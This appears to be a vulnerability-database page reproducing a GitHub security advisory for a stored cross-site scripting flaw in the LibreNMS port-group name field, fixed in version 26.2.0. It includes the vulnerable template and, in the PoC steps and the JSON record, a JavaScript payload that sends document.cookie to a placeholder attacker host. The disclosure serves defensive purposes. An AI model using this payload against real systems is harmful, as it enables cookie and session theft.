GHSA-93FX-G747-695X

Vulnerability from github – Published: 2026-02-18 22:07 – Updated: 2026-02-18 22:07
VLAI?
Summary
LibreNMS /port-groups name Stored Cross-Site Scripting
Details

Summary

/port-groups name Stored Cross-Site Scripting

  • HTTP POST
  • Request-URI(s): "/port-groups"
  • Vulnerable parameter(s): "name"
  • Attacker must be authenticated with "admin" privileges.
  • When a user adds a port group, an HTTP POST request is sent to the Request-URI "/port-groups". The name of the newly created port group is stored in the value of the name parameter.
  • After the port group is created, the entry is displayed along with some relevant buttons like Edit and Delete.

Details

The vulnerability exists as the name of the port group is not sanitized of HTML/JavaScript-related characters or strings. When the delete button is rendered, the following template is used to render the page:

resources/views/port-group/index.blade.php:

@extends('layouts.librenmsv1')
@section('title', __('Port Groups'))
@section('content')
<div class="container-fluid">
<x-panel id="manage-port-groups-panel">
// [...Truncated...]
@foreach($port_groups as $port_group)
// [...Truncated...]

<button type="button" class="btn btn-danger btn-
sm" title="{{ __('delete Port Group') }}" aria-label="{{ __('Delete') }}"

onclick="delete_pg(this, '{{ $port_group-
>name }}', '{{ route('port-groups.destroy', $port_group->id) }}')"> // using the
port's name in the Delete button functionality without sanitizing for XSS related
characters/strings

As the device's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored cross-site scripting.

PoC

  • Login
  • Select Ports > Manage Port Groups
  • Select New Port Group
  • Input 12345');varpt=newImage();pt.src='http://<ATTACKER_IP>/cookiePG'.concat(document.cookie);document.body.appendChild(pt);delete_pg(this, '12345 into the "Name" input box (change <ATTACKER_IP> to be an the IP of an attacker controlled webserver)
  • Select Save
  • Select the Delete Icon for the newly created Port Group
  • Select OK
  • The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled server, leaking the user's cookies.
Severity ?
5.1 (Medium)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "librenms/librenms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "26.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-26992"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-18T22:07:42Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n**/port-groups name Stored Cross-Site Scripting**\n\n- HTTP POST\n- Request-URI(s): \"/port-groups\"\n- Vulnerable parameter(s): \"name\"\n- Attacker must be authenticated with \"admin\" privileges.\n- When a user adds a port group, an HTTP POST request is sent to the Request-URI \"/port-groups\". The name of the newly created port group is stored in the value of the name parameter.\n- After the port group is created, the entry is displayed along with some relevant buttons like Edit and Delete.\n\n### Details\nThe vulnerability exists as the name of the port group is not sanitized of HTML/JavaScript-related characters\nor strings. When the delete button is rendered, the following template is used to render the page:\n\n_resources/views/port-group/index.blade.php:_\n```\n@extends(\u0027layouts.librenmsv1\u0027)\n@section(\u0027title\u0027, __(\u0027Port Groups\u0027))\n@section(\u0027content\u0027)\n\u003cdiv class=\"container-fluid\"\u003e\n\u003cx-panel id=\"manage-port-groups-panel\"\u003e\n// [...Truncated...]\n@foreach($port_groups as $port_group)\n// [...Truncated...]\n\n\u003cbutton type=\"button\" class=\"btn btn-danger btn-\nsm\" title=\"{{ __(\u0027delete Port Group\u0027) }}\" aria-label=\"{{ __(\u0027Delete\u0027) }}\"\n\nonclick=\"delete_pg(this, \u0027{{ $port_group-\n\u003ename }}\u0027, \u0027{{ route(\u0027port-groups.destroy\u0027, $port_group-\u003eid) }}\u0027)\"\u003e // using the\nport\u0027s name in the Delete button functionality without sanitizing for XSS related\ncharacters/strings\n```\n\nAs the device\u0027s name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored\ncross-site scripting.\n\n### PoC\n- Login\n- Select Ports \u003e Manage Port Groups\n- Select New Port Group\n- Input `12345\u0027);varpt=newImage();pt.src=\u0027http://\u003cATTACKER_IP\u003e/cookiePG\u0027.concat(document.cookie);document.body.appendChild(pt);delete_pg(this, \u002712345 into the \"Name\" input box (change \u003cATTACKER_IP\u003e to be an the IP of an attacker controlled webserver)`\n- Select Save\n- Select the Delete Icon for the newly created Port Group\n- Select OK\n- The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled server, leaking the user\u0027s cookies.",
  "id": "GHSA-93fx-g747-695x",
  "modified": "2026-02-18T22:07:42Z",
  "published": "2026-02-18T22:07:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/security/advisories/GHSA-93fx-g747-695x"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/pull/19042"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/commit/882fe6f90ea504a3732f83caf89bba7850a5699f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/librenms/librenms"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/releases/tag/26.2.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "LibreNMS /port-groups name Stored Cross-Site Scripting"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.